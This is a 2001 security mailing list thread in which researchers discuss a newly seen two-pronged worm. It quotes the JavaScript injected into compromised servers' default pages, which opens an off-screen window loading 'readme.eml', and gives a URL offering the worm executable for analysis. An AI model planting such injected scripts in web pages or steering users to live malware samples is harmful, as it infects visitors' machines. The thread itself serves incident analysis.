Security Incidents mailing list archives

RE: New "concept" virus/worm?

From: "Guillaume TARRARE" <gtarrare () webcity fr>
Date: Tue, 18 Sep 2001 19:51:33 +0200

The code written in the default page of a compromised server :

<html><script language="JavaScript">window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script></html>

....



-----Message d'origine-----
De : Jay D. Dyson [mailto:jdyson () treachery net]
Envoye : mardi 18 septembre 2001 18:21
A : Incidents List
Cc : Vuln Dev
Objet : Re: New "concept" virus/worm?


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 18 Sep 2001, Joao Gouveia wrote:

I kept the executables for analysis, if anyone woud like to take a look,
drop me an email.


        Anyone interested in examining the payload can also pick up a copy
at http://www.treachery.net/~jdyson/worms/readme.exe (MD5 hash of the
payload is at http://www.treachery.net/~jdyson/worms/readme.exe.md5).

So, what I ask is, does anyone know about this worm?  I've done a quick
search for it and couldn't find nothing like it.


        It's a two-prong worm.  It appears to be primarily disseminated
via e-mail, and then launches its attacks on web hosts upon successful
infection.

- -Jay

  (    (                                                          _______
  ))   ))   .--"There's always time for a good cup of coffee"--.   >====<--.
C|~~|C|~~| (>------ Jay D. Dyson -- jdyson () treachery net ------<) |    = |-'
 `--' `--'  `-- What doesn't kill us only makes us stronger. --'  `------'

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: See http://www.treachery.net/~jdyson/ for current keys.

iQCVAwUBO6dmYLlDRyqRQ2a9AQHrDwQAg2IRpTh5c9hzhk1NTWdR3Ta6lsnmn5rg
KUPnc6lpecvtiaYkPxPTiSuQT4sUndXOfS5eaHn9JagI/bFGcRAWHW1tRFzafU1N
1TX57UiRYo9abt5DBbh7sdIsRrm3nhFaifkzog7yQp46B/GzvzlCeBT/4CeIbgXY
gg1laOKK4AY=
=OrqU
-----END PGP SIGNATURE-----



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

Re: New "concept" virus/worm?, (continued)
- - - Re: New "concept" virus/worm? Jim Olsen (Sep 18)
    - Re: New "concept" virus/worm? Bernie Cosell (Sep 18)
    - MIME type of readme.eml (was Re: New "concept" virus/worm? Rob Quinn (Sep 19)
    - Re: MIME type of readme.eml (was Re: New "concept" virus/worm? Henrik Pedersen (Sep 19)
    - Re: New "concept" virus/worm? Ryan Russell (Sep 18)
    - Re: New "concept" virus/worm? Nick FitzGerald (Sep 18)
    - Re: New "concept" virus/worm? Jim (Sep 18)
    - Side Affect of the new worm: HD fills up Stanley G. Bubrouski (Sep 19)
    - Re: New "concept" virus/worm? Michael H. Warfield (Sep 18)
  - Re: New "concept" virus/worm? Dan Jones (Sep 18)
  - RE: New "concept" virus/worm? Guillaume TARRARE (Sep 18)
    - RE: New "concept" virus/worm? Joseph P Frazee (Sep 18)
  - RE: New "concept" virus/worm? Ronny Vaningh (Sep 18)
- RE: New "concept" virus/worm? Christian Hampson (Sep 18)
  - RE: New "concept" virus/worm? Tina Bird (Sep 18)
- RE: New "concept" virus/worm? Peter Mueller (Sep 18)
- RE: New "concept" virus/worm? Tom Smit (Sep 18)